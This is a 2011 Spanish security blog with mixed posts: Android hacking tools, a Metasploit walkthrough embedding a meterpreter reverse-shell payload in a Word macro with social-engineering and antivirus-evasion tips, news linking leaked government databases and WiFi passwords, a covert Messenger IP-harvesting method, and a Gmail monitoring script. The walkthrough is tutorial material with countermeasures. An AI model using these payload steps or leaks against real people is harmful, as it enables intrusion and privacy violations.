martes, 27 de diciembre de 2011

Como Hackear una cámara de control de Placas

Hola, escribiendo después de tiempo, estoy ocupadísimo con el trabajo así que espero organizarme mejor este 2012 para no dejar huerfano al blog.

En este post una idea muy interesante para hackear un sistema de lectura de placas la idea se explica en las siguientes imágenes:

image

Como la cámara lee el contenido de la placa y luego es enviada al reconocedor de caracteres y posiblemente almacenada en una base de datos, existe una posibilidad de realizar un SQL Injection (Se lee el ‘DROP DATABASE’?, Sonrisa ).

Saludos y un venturoso 2012!!!

martes, 15 de noviembre de 2011

sábado, 29 de octubre de 2011

Kit de herramientas de seguridad y hacking para Android

roadWarrior

Imágen de Android Guerrero por Irskaad

Esta no es una lista cerrada (la iremos ampliando), vamos a mostrar algunas aplicaciones gratuitas que convierten tu Android en un auténtico road warrior para la auditar la seguridad de todo tipo de redes y sistemas.

Lo primero ya sabes, es necesario que tengas tu Android rooteado, la mayoría de estas aplicaciones lo requieren. Android es prácticamente un Linux, y por lo tanto estas aplicaciones de bajo nivel requieren acceso root a la mayoría de las funciones del sistema.

Vamos con esta auténtica navaja suiza de la seguridad Android:

Router Passwords: más que una aplicación, es una base de datos con toda la información  (login y passwords por defecto) de multitud de routers de todas las marcas.

Router Brute Force: si no quieres molestarte mirando el diccionario en la aplicación anterior, puedes intentar averiguarla (por fuerza bruta, usando diccionarios) a través de este programa. Si ya tienes acceso a una red, esta herramienta es perfecta para intentar acceder al router.

Terminal Emulator: necesario, tener siempre a mano una ventana de línea de comandos (shell de Linux) por lo que pueda pasar ;)

Wireless Tether: si necesitas conectar el ordenador a Internet, esta es la aplicación perfecta para hacerlo desde el móvil. Crea un WiFi desde la cual puedes conectar cualquier ordenador y tener acceso a la web.

NetWork Discovery: creo que es la aplicación que más información te ofrece sobre una red. Es capaz de escanear una red y mostrar un listado de todos los dispositivos conectados a la misma con sus respectivas direcciones IP y MAC. Pero no sólo eso, además te lo identifica, si es un router, un PC, una impresora, etc.

PulWifi: muestra las contraseñas por defecto de algunos puntos de acceso WiFi. Soporta las de WLAN_XXXXX, JAZZTEL_XXXXX, YACOMXXXXX, WIFIXXXX, algunos modelos de D-Link y de Huawei. Perfecto para analizar el nivel de seguridad de tu WiFi.

Shark: sniffer  de red que funciona en 3G y Wifi. Es un port del famoso tcpdump. Te permite examinar los paquetes TCP/IP que pasan por tu sistema.

ConnectBot: cliente Telnet/SSH de código abierto, permite también hacer SSH tunneling (técnica utilizada para evitar cortafuegos ó proteger tu información).

WifiAnalyzer: otra herramienta más para analizar a fondo una WiFi. Muestra los canales, MAC, tipo de encriptación y la potencia de la señal. Ideal para encontrar el canal perfecto para ajustar nuestro hardware.

ElectroDroid: cuando tienes que pasar a la acción a nivel hardware, esta aplicación puede que te venga bien. Es una biblioteca de referencia sobre Electrónica, que incluye código de color de resistencias, calculadora de varias fórmulas electrónicas, patillaje de todos los puertos de un ordenador y de aparatos de video, tablas de todo tipo, etc. Indispensable.

WLANAudit: aplicación para encontrar redes WiFi y comprobar su seguridad. Con algunos puntos es capaz de calcular la contraseña por defecto del cifrado empleado.

WiFi File Explorer: permite compartir ficheros desde tu dispositivo móvil. En otras palabras, convierte tu móvil en un servidor de ficheros dentro de la red.

Bluetooth File Transfer: busca, explora y gestiona ficheros en cualquier dispositivo Bluetooth usando FTP y OPP. No sólo vivimos de WiFi’s ;)

Hackers Dictionary: por si olvidas algún término, aquí tienes el famoso Jargon File.

Working with BackTrack: desde la instalación de BackTrack hasta todo tipo de información sobre esta distribución Linux de seguridad. Incluye vídeos y documentos de todo tipo, altamente recomendable.

Droidsheep: si ya conoces Firesheep ya sabes de que va esta herramienta. Como la definen en su web “Secuestro de sesiones en un sólo click” o como diría yo (tuxotron) “Secuestro de sesiones a golpe de ratón dedo” :) .

Faceniff: permite capturar sesiones web sobre wifi. Funciona sobre redes Abierta/WEP/WPA-PSK/WPA2-PSK. Es parecida a Droidsheep.

Router Keygen: al igual que PullWifi, detecta y genera las claves de encriptación (WEP y WPA) por defecto de: Routers basados enThomson (Thomson, SpeedTouch, Orange, Infinitum, BBox, DMax, BigPond, O2Wireless, Otenet, Cyta , TN_private ), DLink (sólo algunos modelos), Pirelli Discus, Eircom, Verizon FiOS (sólo algunos modelos), Alice AGPF, FASTWEB Pirelli and Telsey, Huawei (algunos Infinitum), Wlan_XXXX or Jazztel_XXXX (Comtrend y Zyxel), Wlan_XX (algunos modelos), Ono ( P1XXXXXX0000X ), WlanXXXXXX, YacomXXXXXX y WifiXXXXXX (también conocido como wlan4xx ), Sky V1, Clubinternet.box v1 y v2 (TECOM), InfostradaWifi

Fing – Network Tools: herramienta que nos provee funcionalidades para sacar todo tipo de información de un red: network discovery, escaneo de servicios, ping, traceroute, DNS lookup, etc. Muy completa.

Shark Reader: lector de ficheros pcap. Por lo visto tiene problemas con ficheros grandes, pero nos podría resultar muy útil para echar un vistazo rápido después de haber capturado tráfico de red.

Arpspoof: una utilidad casi indispensable para capturar tráfico de red que no vaya dirigido a nosotros usando lo que se conoce como arp spoofing. Digo casi indispensable, porque que podemos conseguir lo mismo con tcpdump.

tcpdump: este no lo teníamos en la lista y que puede decir de éste. Tcpdump es la herramienta de facto de cualquier máquina *nix, para analizar el tráfico de red y por consiguiente capturarlo. Esta versión para Android no tiene la potencia que la de un sistema *nix, pero nos ofrece las funcionalidades básicas, entre ellas la captura de paquetes.

Anti: Android Network Toolkit es un conjunto de utilidades que nos permite explotar servicios en una red local. Es una especie de mini metasploit para Android. El problema es que tiene varias versiones y con lo que te ofrece la gratuita lo puedes hacer con el resto de herramientas aquí listadas, pero se eres un profesional de la seguridad informática, ésta seria una gran adición a tu caja de herramientas.

Routerpwn: colección de vulnerabilidades para los rourters más conocidos y dispositivos embebidos.

Bueno esta lista supongo que se puede ampliar, esperamos vuestras aportaciones.

Por supuesto, CyberHades no se hace responsable del mal uso de todas estas aplicaciones, vamos que ya somos mayorcitos ;)

Fuente: http://www.cyberhades.com/2011/10/20/kit-de-herramientas-de-seguridad-y-hacking-para-android/

jueves, 6 de octubre de 2011

Security Jack all Trades–Cartero

Continuando con el post anterior, a continuación las instrucciones:

Este es un test que se trabaja bajo escenarios, cada escenario es familiar por lo que no necesitas conocimientos técnicos, cada escenario tiene cuatro preguntas, las respuestas deben ser breves (las pueden publicar acá), las respuestas de “ciencia ficción” no son válidas, si lo toman por su cuenta, cada una debería tomarles 10 minutos. Podemos discutir las respuestas (de hecho esa es la idea).

Escenario Uno – Cartero

Eres un cartero de un servicio de correo postal independiente. Tienes que entregar un paquete del tamaño de un libro.

1. Enumere 10 maneras de identificar al RECEPTOR del mensaje.

2. Liste 10 cosas que te impedirían de entregar el paquete.

3. Liste 10 razones para no entregar el paquete.

4. Enumere 10 maneras de identificar al REMITENTE del mensaje.

Espero sus respuestas!!!

sábado, 1 de octubre de 2011

Client Side Attacks 1 de 3

Continuemos con la presentación de ataques al lado del cliente, como prólogo (y algo de historia) podemos indicar que el movimiento inicial en temas de ataque corría a través de la conexión a servicios públicamente disponibles por diversas entidades, el famoso PortScanning permite realizar dichas acciones para que, en base a los servicios encontrados, el atacante pueda realizar ataques de password cracking sobre los servicios, enviarle algún exploit o verificar si existe algo para el information gathering, de hecho existen servicios como Shodan que permiten hacer una búsqueda de servicios al estilo de un motor de búsqueda, para disminuir este vector de ataque tenemos distintos sabores de firewall y configuraciones.

Cerrados estos puntos, el atacante comenzó a atacar a los servicios y aplicaciones que se encuentran bajo estos pocos (en el mejor de los casos), que en la mayoría de los casos son aplicaciones Web, de ahí vienen las técnicas de inyección de parámetros (SQL Injection, XSS, Parameter Pollution, etc.). Ante esto, técnicas de programación segura (SDLC) es lo esencial, claro que ayuda un WAF o un DBF de por medio Guiño.

Entonces que hacemos una vez que se han cerrado todos estos vectores de ataque…., recurrimos a nuestro buen (e ingenuo) amigo: el empleado, estas técnicas de ataque están orientadas a ellos, puede ser tan grande el impacto que este año llevamos algunas grandes empresas atacadas por estas técnicas: Google, Comodo, RSA, etc. entre las más conocidas.

Podemos definir 3 tipos de client side attacks: File Format, Web Attacks y Código Móvil, en este post nos concentraremos en la primera.

File Format

En un ataque de tipo file format, se ataca mediante un exploit o contenido malicioso, a las aplicaciones de escritorio del usuario: Word, Excel, Acrobat, Winamp, etc., la idea es generar un archivo con las características mencionadas, en este ejemplo vamos a realizar un ataque contra Word, utilizando Metasploit.

Metasploit tiene un módulo de generación de payloads, el cual nos permitirá generar el código malicioso, que luego incrustaremos al documento, el comando es el siguiente:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.52.131 LPORT=443 V > /root/exploit.bas

Lo que acá indicamos es que utilice el payload meterpreter, mediante un reverse tcp (shell inverso), una vez que se ejecute realice la conexión contra el host 192.168.52.131 (puede ser una dirección pública si realizamos el ataque a través de internet), hacemos que se conecte a través del puerto 443 (SSL), puesto que la mayoría de las compañías tienen ese puerto habilitado de salida para sus usuarios para que puedan navegar hacia sitios seguros, finalmente hacemos que se cree el payload en código de Visual Basic (la opción “V”) y lo envíe a la ruta indicada. Si lo deseamos podemos añadir encriptación mediante el módulo msfencode, o mejor aún utilizar los dos en un solo comando mediante msfvenom.

El payload generado tiene dos partes, la primera se coloca como un macross en Office, para ello copiamos el archivo generado, hasta antes de las líneas PAYLOAD DATA y lo guardamos en otro archivo.

image

Ingresamos al Editor de Visual Basic:

image

E importamos el archivo anteriormente generado:

image

Con lo cual tendremos el módulo cargado:

image

Cerramos el editor de visual basic (guardando lo cambios), y luego copiamos la segunda parte del documento, a partir de PAYLOAD DATA

image

Y copiamos su contenido al final del documento:

image

Con ello ya tenemos el archivo malicioso generado, estos tipos de archivos usualmente son propagados mediante cadenas o combinados con técnicas de ingeniería social para que el usuario abra el archivo con confianza.

Antes de continuar con el ataque se necesita habilitar el servicio de escucha en Metasploit, para que cuando el usuario abra el archivo y realice la conexión, nosotros estemos preparados escuchándola, los siguientes comandos nos ayudan:

./msfcli exploit/multi/handler LHOST=192.168.52.131 LPORT=443 PAYLOAD=windows/meterpreter/reverse_tcp E

Con ello indicamos la apertura de un servicio de escucha genérico (multi/handler) en nuestra maquina a través del puerto 443 esperando un reverse_tcp, con lo cual tendremos el servicio a la escucha:

image

Finalmente solo queda esperar que el usuario abra el documento, en este caso uno con SO Windows 7 y Office 2010:

image

Como se aprecia en la imagen el mismo Office no permite por defecto la ejecución de Macross, para ello es importante las técnicas de ingeniería social para convencer al usuario de abrir el documento, o por ejemplo enviar en un Excel, muchos empleados de áreas comercial o marketing, tienen siempre habilitada la ejecución de Macross, con ello tenemos:

image

Cuando el usuario acepta, casi inmediatamente, tendremos el acceso desde el lado del atacante:

image

Desde ahora, el atacante pude hacer lo que desee, por ejemplo hacer un dump de los hashes de los usuarios de Windows, copiar contenido de esa maquina o, en el peor escenario, utilizar la maquina para hacer pivoting (que funcione como zombie) para atacar desde adentro a otros servidores internos.

Contramedidas

Como se mencionó anteriormente parte de la configuración de Office impide este tipo de ataque a menos que intervenga el usuario, es posible entonces afinar algunas reglas mediante GPO’s para impedir la ejecución de Macross, otra acción a realizar viene de la mano del antivirus el cual detecta estos payloads:

image

Sin embargo, como lo mencionamos es posible añadir encriptación para hacer al payload indetectable.

Otra medida algo más adecuada es hacer uso de un antivirus con Firewall personal incorporado, los mismos permiten cerrar las conexiones mediante programas fuentes de confianza.

image

En el mismo podemos indicar que programas del usuario tienen salida a internet y hacia que puertos, con ello impedimos que como mostramos en este ejemplo un archivo Word se conecte contra un equipo a través de puertos no autorizados.

Espero sus comentarios mientras continuamos con la segunda parte.

Saludos cordiales

martes, 27 de septiembre de 2011

Hacktivismo: en defensa por el Tipnis

El hacktivismo es la protesta del Hacker, la forma de expresión cuando la injusticia es irrefrenable, la forma de gritar al mundo la injusticia con un mensaje claro y conciso de su accionar en pro de los ideales.

En este momento varios sitios han sido atacados, defaceados y denegados sus servicios en señal de protesta contra el el gobierno por el tema de la carretera que pasa por el TIPNIS, de hecho el grupo Anonymous Bolivia (el verdadero, esperemos) ha anunciado:

"Queremos informarles que este 27 de septiembre llevaremos a cabo la Operación Bolivia en defensa del TIPNIS, y aclararles que es la única operación a realizarse en Bolivia. Es indignante que algunos grupos adversarios estén en contra de la marcha de más de un millar de indígenas, tan solo por estar vendidos al monopolio de la hoja de coca, del poder político y del dinero. En la marcha, denominada defensa del TIPNIS, caminan personas que viven en el lugar; para muchos es lo único que tienen. Ellos defienden la tierra de nuestros padres y abuelos para que todos podamos disfrutarla"


Desde hace dos dìas se ha reportado al sitio de El Diario como atacado, no por el grupo Anonymous sino por Tiger M@te – Bangladeshi Hacker.
En este momento el sitio del Defensor del Pueblo (defaceado en la mañana) es inaccesible (DoS - ¿o están reponiendo el sitio?):



Con el sitio de la presidencia pasó lo mismo en horas de la mañana, aparentemente el servicio ha sido restituido.

Adicionalmente se reportó en el sitio http://www.wikileaksbolivia.org la publicación de bases de datos de órganos de gobierno:

- Base de datos de Diprove: http://www.wikileaksbolivia.org/index.php/nacionales/1-ultimas-noticias/660-anonymous-acaba-de-liberar-la-base-de-datos-de-diprove-la-verdad-sobre-los-chutos

- En Pastebin: http://pastebin.com/XK4cxLyb se encuentra la base de datos del Instituto Geográfico Militar.

- También en Pastebin: http://pastebin.com/QN2K874p, el grupo Lulzsec Bolivia ha publicado usuarios y contraseñas de más de 2900 usuarios WiFi Entel.

Son los ataques que logré encontrar hasta ahora, momento en el cual ha renunciado parte del gabinete presidencial y están posesionando a nuevos ministros.

Saludos a todos

viernes, 23 de septiembre de 2011

El bit que rebalsó el Buffer: EKOPARTY!!!

En este momento esta acabando la conferencia latinoamericana más cool en temas de hacking: Ekoparty, la cual se realiza en Argentina cada año, para aquellos interesados que no pudieron asistir, afortunadamente publican los videos de las charlas en su sitio, el link es el siguiente:

http://www.ekoparty.org/videos.php

Este año la gran novedad: Rompieron el cifrado de SSL/TSL v1 presentado por Thai Duong en su expo: BEAST: Surprising crypto attack against HTTPS, usualmente después de estas conferencias hay muuuucho por hacer para la gente de seguridad, asi que manos a la obra y a esperar los videos de esta versión.

Saludos!!!

lunes, 19 de septiembre de 2011

Client Side Attacks

Esta es la presentación que realicé en el evento de hacking Tinkuyhack, a principios de mes

Client side attacks

En futuros post voy a detallar el contenido. Se trata de los ataques dirigidos hacia el eslabón más debil: el usuario. Existen varios vectores de ataque que utilizan tecnicas de explotación a las aplicaciones con ingeniería social, lo que recuerda ataques a grandes empresas como RSA, Google, Comodo y otras grandes empresas.

Saludos!!!

jueves, 15 de septiembre de 2011

Facebook se arrodilla en Alemania

Facebook parece haber comprendido que la cultura de protección de datos en Alemania dista mucho de la de EEUU y ha accedido a endurecer aquí las condiciones en las que sus usuarios pueden compartir información con grupos más o menos restringidos. Tras varias reuniones con autoridades alemanas, la compañía ha decidido aplicar en Alemania una nueva subdivisión de 'amigos cercanos' y una nueva de 'conocidos', dando al usuario la oportunidad de escalonar el grado de relación con los demás y compartir ciertos datos solamente con direcciones predeterminadas.
La compañía ha fichado a la ex eurodiputada alemana Erika Mann como enlace con las autoridades europeas en Bruselas para, en el futuro, encauzar a través de ella los servicios que presta en este continente. Mann trabajará en estrecho contacto con Erin Egan, el abogado especializado en Internet que trabajará para Facebook desde Washington.
Facebook acepta así un código de conducta autoregulada de protección de datos en Alemania, uno de los países con leyes federales de protección de datos más estrictas del mundo. El mes pasado, el Estado de Schleswig-Holstein ordenó la eliminación del botón 'like' de Facebook, y amenazaba con fuertes multas, alegando que Facebook desarrolla perfiles de los usuarios y no usuarios por igual con los datos del botón 'like', lo que viola la ley alemana.
Las autoridades alemanas también habían instado a Facebook a desactivar la función de reconocimiento facial justificando la petición en que equivale a la recolección de datos no autorizada de las personas. Facebook ha decidido atender estas peticiones y establecer un código de conducta específico para este país después de que Richard Allan, director de Facebook de política pública europea se reuniese la semana pasada con el ministro del Interior alemán, Hans-Peter Friedrich en Berlín.
FUENTE :http://www.elmundo.es/elmundo/2011/09/14/navegante/1315987557.html
http://foro.elhacker.net/noticias/facebook_se_arrodilla_en_alemania-t338946.0.html#ixzz1XyyaFPlv

jueves, 1 de septiembre de 2011

Cómo conseguir la IP de tus contactos de Windows Live Messenger

Buenas, en muchos sitios se dice cómo es posible obtener la IP de un contacto de Messenger enviándole un fichero y mirando con netstat las conexiones.

Aquí voy a mostrar cómo es posible hacerlo sin enviar ningún fichero. Y obtener no solo la IP pública sino también las IPs internas de sus adaptadores de red. Se hará de forma manual, usando netstat, después usando Wireshark y por último expondré un programa que he realizado que automáticamente muestra las IPs de los contactos según se van obteniendo.

Lo primero que debemos saber es cómo funciona Messenger por encima. La autenticación la realiza conectándose a los servidores de Microsoft vía SSL. Una vez autenticado todas las conversaciones pasan por los servidores de Microsoft sin ningún tipo de cifrado (así que cuidado con utilizar Messenger en redes inseguras).

Un tema aparte es como se envían entre los contactos ficheros, imágenes, avatares y emoticonos. Para ello Messenger utiliza un protocolo p2p. Así que cuando un contacto solicita por ejemplo nuestro avatar se inicia una negociación entre nosotros y el contacto para ver cómo es posible realizar la conexión. En este punto ambas partes se intercambian las IPs internas y externas, puertos, tipo de conexión, si usamos NAT, UPnP, etc…

En en este punto a donde podemos aprovecharnos para saber la IP del otro contacto.


Con netstat

La opción más fácil es utilizar netstat para monitorizar las conexiones y ver las nuevas conexiones que realiza el proceso del Messenger. Vamos a ello. Todo desde la consola.

El proceso encargado de las comunicaciones de Messenger es wlcomm.exe. Así que obtenemos su PID:

tasklist | find "wlcomm.exe"


Ahora con el PID podemos filtrar la salida de netstat para quedarnos solo con las conexiones que realiza dicho proceso(requiere permisos de administrador):



netstat -nabo | find "PID_ENCONTRADO"


image


Ahora en este punto iniciamos una conversación con el contacto del que nos interesa saber la IP y le enviamos un emoticono personalizado, para no levantar sospechas lo mejor es un emoticono transparente o blanco. Se iniciará la negociación entre los dos clientes y se iniciará la conexión. Volvemos a lanzar el comando anterior y veremos una nueva conexión de nuestro contacto.



image





Con Wireshark


Vamos a filtrar los paquetes obtenidos por Wireshark para quedarnos con aquellos donde se realiza la negociación entre dos contactos. De ahí cogeremos la IP externa y las internas.



Wireshark ofrece el filtro “msnms” para quedarnos con los paquetes del procolo de Messenger.



image



Mirando paquete a paquete en uno de ellos encontraremos algo así:



image



Fijaos en estas cadenas:

“srddA-lanretxE4vPI” Dando la vuelta a la cadena: IPv4External-Addrs


“srddA-lanretnI4vPI” –> IPv4External-Addrs



En esos campos se muestran las IPs y puertos donde se debe realizar la conexión. Claro que hay que darles la vuelta. Mirando el campo “From:” sabremos de que contacto es la IP.



Ir mirando los paquetes uno a uno buscando estos campos no parece muy divertido. Es mas cómodo hacer un filtro que busque en todo el paquete la cadena “srddA-lanretxE4vPI” o “stroPdnAsrddAlanretxE4vPI” (que es otra de las formas en las que aparece).



Este es el filtro que se queda con los paquetes que nos interesan:



frame[0:] contains 73:74:72:6f:50:64:6e:41:73:72:64:64:41:6c:61:6e:72:65:74:78:45:34:76:50:49:3a:20:36:34:37:33:3a:31:39:2e:35:30:31:2e:39:34:2e:35:38:0d:0a or frame[0:] contains 73:72:64:64:41:2d:6c:61:6e:72:65:74:78:45:34:76:50:49


image





Con mi programa “GetMSNIPs”


Usando Wireshark con el filtro se pueden obtener las IPs de una manera bastante cómoda. Pero me apetecía hacerlo un poco mas sencillo y ya de paso programar algo usando WinPcap.



El resultado es este programa que ahora expongo, le he llamado GetMSNIPs, me encantan los nombres originales. No pongo el código aquí que son 300 líneas.



GetMSNIPs: Source y binario.



Una captura de cómo funciona:



image



Modo de uso:





  1. Si no tiene instalado WinPcap, instálelo!.





  2. Arranque “GetMSNIPs” y seleccione la interfaz con la que se conecta a internet.





  3. Inicie Windows Live Messenger y cámbiese de avatar, utilice uno que no haya usado antes (así sus contactos no lo tendrán y se iniciará una conexión P2P para su envío).





  4. Espere un tiempo ó inicie conversaciones con sus contactos para forzar a que carguen su avatar y capturar así su IP.





Así que ya sabéis, si usáis Windows Live Messenger estas diciendo a tus contactos tu dirección IP. No es un gran problema, pero está bien saberlo.



Saludos!



Fuente: http://el-blog-de-thor.blogspot.com/2011/09/como-conseguir-la-ip-de-tus-contactos.html

miércoles, 31 de agosto de 2011

YPFB NO fue hackeado por Anonymous

Llego a esta conclusión luego de ver brevemente la noticia (me informé algo tarde), a continuación lo explico.

Luego de ver la imagen en varios periodicos digitales:

image

Estuve pensando en que vi esa imagen en alguna parte, para no hacer largo el relato, este fue el razonamiento.

Se trata de un defacement, Anonymous unicamente hace hacktivismo a fin de promover sus ideas, en cambio un hacker de sombrero negro lo hace por fama, ahora, todos los que hackean por fama (mal por ellos), publican sus resultados en zone-h.com, entonces busquemos algunos sitios hackeados recientemente.

image

Sorpresa!!!, el grupo se llama Bolivian-hacking (ninguna novedad), y ya ha defaceado varios sitios, entre ellos pocos sitios bolivianos: breick.com.bo, atb.com.bo, santaanabeni.gob.bo, siendo que la mayoria de los sitios defaceados son argentinos, incluso algunos sitios siguen defaceados!!!:

image

Ahora vieron la imagen de la cara con la bandera de Bolivia???, redirige a través de un acortador de URL a este sitio:

http://www.omuni-telecom.com/wp-content/uploads/2011/05/Cara_con_bandera_de_Bolivia1.jpg

Hagamos un listado del directorio:

image

Es un sitio con logos de Tigo, Viva, entre otros dedicado al tema de servicios de networking. No creo que el atacante sea tan $··”%&! como para ser el dueño de esa página (es lo menos probable), sin embargo acá tenemos una gran pista, los archivos de imagenes que mostramos en este sitio fueron generados en mayo del presente año. YPFB dice que es muy dificil dar con el autor, pero me pregunto…

¿No podemos comparar las IP’s de este sitio, con las fechas anunciadas por Zona-H y finalmente compararlas contra las IP’s de los servidores de YPFB?.

A la conclusión que llego es que la persona que está detrás de esto se escuda en Anonymous como red internacional para realizar sus actividades delictivas, y que con un poco de esfuerzo, es posible obtener algunos resultados.

Veamos como se desarrollan los hechos…

Nelson Boris Murillo Prieto

lunes, 29 de agosto de 2011

Top 5 errores de seguridad en el mundo IT

Lo cierto es que ya estamos acostumbrados -y casi inmunizados- a los clásicos listados de errores típicos en materia de seguridad: No parchear sistemas, no realizar una buena monitorización etc etc ...

Es difícil aportar algo nuevo a esta clase de 'rankings', no obstante he encontrado este artículo de Network World en el que se aborda la problemática desde un punto de vista de enfoque que me ha gustado bastante. Me tomo la licencia de transcribir el artículo con mi propia interpretación

Error 1: Pensar que la mentalidad empresarial de la organización es la misma que hace cinco años


Hace cinco años el tipo de dispositivos que accedían a una red corporativa se limitaban a los equipos plataformados de la compañía, sean equipos de sobremesa o portátiles.

Actualmente eso no es así, cada vez más se imponen los 'smartphones' como elementos empresariales, y ahora asistimos a la moda de los tablets. En definitiva, un montón de nuevos equipos que ni de lejos han sido diseñados para ejercer sobre ellos el tipo de control que se puede tener sobre el típico equipo Windows dentro de un dominio.

Sumemos a este escenario la cantidad de aplicaciones 'Cloud' de uso ampliamente difundido, y tenemos un escenario bastante complejo de gestionar que requiere una estrategia mucho mas moderna.

Error 2: No saber establecer las relaciones correctas entre el equipo de seguridad y el resto de áreas IT

El ya clásico tira-y-afloja entre la división de seguridad y el resto de departamentos. Para cualquiera que haya trabajado en una empresa IT le sonarán altamente familiares las discusiones entre lo que quiere el grupo de desarrollo, los plazos del grupo de marketing, el coste que impone el grupo financiero y las objeciones del equipo de seguridad.

Tener muy clara y definida la 'cadena de decisión' es clave.

Error 3: No comprender que la virtualización requiere nuevas estrategias de seguridad

Es obvio que según se van integrando las tecnologías de virtualización el enfoque debe cambiar. Se ha puesto muy de moda el introducir servicios ya paquetizados en formato vmware -por ejemplo- que supuestamente son 'plug&play', pero en lo que pocas veces se piensa es en como se parchean estos equipos y como se gestiona su seguridad

Error 4: No estar preparados para una fuga de datos

Probablemente siempre se tiene claro que documentos son considerados sensibles dentro de una organización pero ¿y si aparecen fuera de la organización? Tener mecanismos para identificar accesos a documentos y disponer de una trazabilidad al respecto es clave

Error 5: Complacencia con los proveedores

Muy típico en España, una vez la organización establece su red clientelar de 'partners' pocas veces existe un espíritu crítico para revisar lo que nos están vendiendo. Hay que tener claro que la solución ofertada por un proveedor X no tiene porque ser la mas correcta aunque en anteriores ocasiones nos haya suministrado aplicaciones interesantes.

Hay que mantenerse alerta y al tanto de lo que hay en el mercado de una forma global, no solo a través de los ojos de nuestros partners.

Fuente: http://www.securitybydefault.com/

Gmail Security Center

Gmail, el servicio sobre el que pivotan otros tantos servicios de Google y que mucha gente emplea como 'cuenta principal' y tienen asociada a servicios como Twitter, Facebook o cosas mas serias como bancos, compañías telefónicas, servicios de hosting, etc.

Se podría decir que para mucha gente es su activo mas valioso en su 'ciber-vida', por lo que protegerlo debería de ser algo importante.

Hace algún tiempo liberamos una pequeña guía de seguridad para Gmail y hoy vamos a presentar una herramienta que permita monitorizar el uso de una cuenta en Gmail.

Como probablemente todo el mundo sepa, Gmail tiene de serie un histórico de uso que permite comprobar el uso reciente de la cuenta

El problema es que solo registra los 10 últimos accesos, por lo que, o tomas la sana costumbre de revisar esa información casi a diario, o probablemente perderás información. No existe forma de consultar un histórico de actividad mas allá de esos 10 últimos accesos.

Dándole un par de vueltas a esto se me ocurrió crear una herramienta que hiciese tres cosas:

  • Poder generar un histórico de accesos a la cuenta virtualmente 'infinito' para consultar los accesos según fuese necesario
  • Ampliar la información que ofrece Gmail, no solo con IP / País sino también ciudad e ISP
  • Tener la posibilidad de enviar alertas en función de la nueva actividad que se generase en esa cuenta (accesos)

Y la solución a esos problemas la he llamado 'Gmail Security Center' y está basada en este excelente ejemplo sobre como usar el módulo 'mechanize' en Python que he modificado para acceder a la información de actividad, añadido soporte para enviar 'tweets' para las alertas en tiempo real e incorporado el uso de Geolocalización .

# This Python file uses the following encoding: latin-1

import mechanize
import cookielib
import re
import sys
import getpass
import time
import GeoIP
import commands
import tweepy

#Twitter Auth

CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_KEY = ''
ACCESS_SECRET = ''

auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)

#Geoip

gi = GeoIP.open("GeoLiteCity.dat",GeoIP.GEOIP_STANDARD)

# Browser
br = mechanize.Browser()

# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

# Browser options
br.set_handle_equiv(True)
#br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

# User-Agent (this is cheating, ok?)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

# The site we will navigate into, handling it's session
br.open('http://gmail.com')

# Select the first (index zero) form
br.select_form(nr=0)

# User credentials

print "Gmail Security Center [ Security By Default http://www.securitybydefault.com ]"

login = raw_input("Login:")
password = getpass.getpass("Password: ")

br.form['Email'] = login
br.form['Passwd'] = password

# Login
br.submit()

req = br.click_link(text='Información detallada')
br.open(req)

ips = []

while 1==1:

html = br.response().read()

ipscitas = re.findall('(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})', html)

if ipscitas:

for resultado in ipscitas:

if not ips.count(resultado):

ips.append(resultado)

command_str = 'whois %s | grep "desc"' % resultado

whoisret= commands.getoutput(command_str)

whoisret = whoisret[1:-1].split('\n')

m =re.search("(escr|descr): (.+)", whoisret[0])

isp= m.group(2)

gir = gi.record_by_name(resultado)


if gir != None:

print resultado, gir['country_name'], gir['city'], gir['region_name'], isp

twittersend = resultado + " " + str(gir['country_name']) + " " + str(gir['city']) + " " + str(gir['region_name']) + " " + isp

try:
api.send_direct_message(screen_name= '@YJesus', text = twittersend )

except :

pass

br.reload()

time.sleep(900)



Para poder usarlo, primero debéis tener instalado en el sistema el módulo 'mechanize', lo mas fácil para instalar ese y otros módulos ajenos al core de Python es usar el comando -como root- 'easy_install' disponible en el paquete python-setuptools (al menos en Fedora)



# easy_install mechanize



Una vez instalado ese módulo, hay que dar soporte GeoIP instalando la librería en C de Maxmind y su bind a python (información para hacerlo aquí) y descargar una base de datos actualizada



Finalmente, viene la parte mas engorrosa de todo el asunto y es que Twitter, cuando forzó a usar OAuth en todo aquello que tuviese que interactuar con el, hizo que enviar tweets desde una aplicación fuese un proceso bastante laborioso. Aquí hay un tutorial bastante bueno sobre como registrar una aplicación hecha en Python para poder usar Twitter



De lo que se trata es de poder rellenar los siguientes campos en el script:



CONSUMER_KEY = ''

CONSUMER_SECRET = ''


ACCESS_KEY = ''


ACCESS_SECRET = ''



Una vez hecho eso, el script monitorizará la actividad de la cuenta GMail y cuando vea nueva actividad enviará alertas parecidas a esta:









Que serán cómodamente recibidas y procesadas vía Twitter, adicionalmente se puede sacar un histórico volcando la salida del script a un fichero



Fuente: http://www.securitybydefault.com/

viernes, 26 de agosto de 2011

Security Jack All Trades

Alguna vez te preguntaste que se necesita para realizar trabajos de Ethical Hacking y Penetration Test?, primero esta el gusto por la tecnología, y hablamos de tecnología en general, puesto que vas a encontrar varios escenarios en los que requieras conocimientos mixtos de especialidades como:

- Bases de Datos

- Redes

- Programación

- Infraestructura

- Cumplimiento normativo (ASFI, Ley de Telecomunicaciones, ISO 27001/2, COBIT, PCI-DSS,)

- Metodología de Trabajo (OSSTMM, OWASP, ISSAFF, etc.)

Estos entre otras, entonces si nunca te gusto alguna de estas materias (sobretodo las técnicas, las otras te TIENEN que gustar) no vas a poder desenvolverte cómodamente.

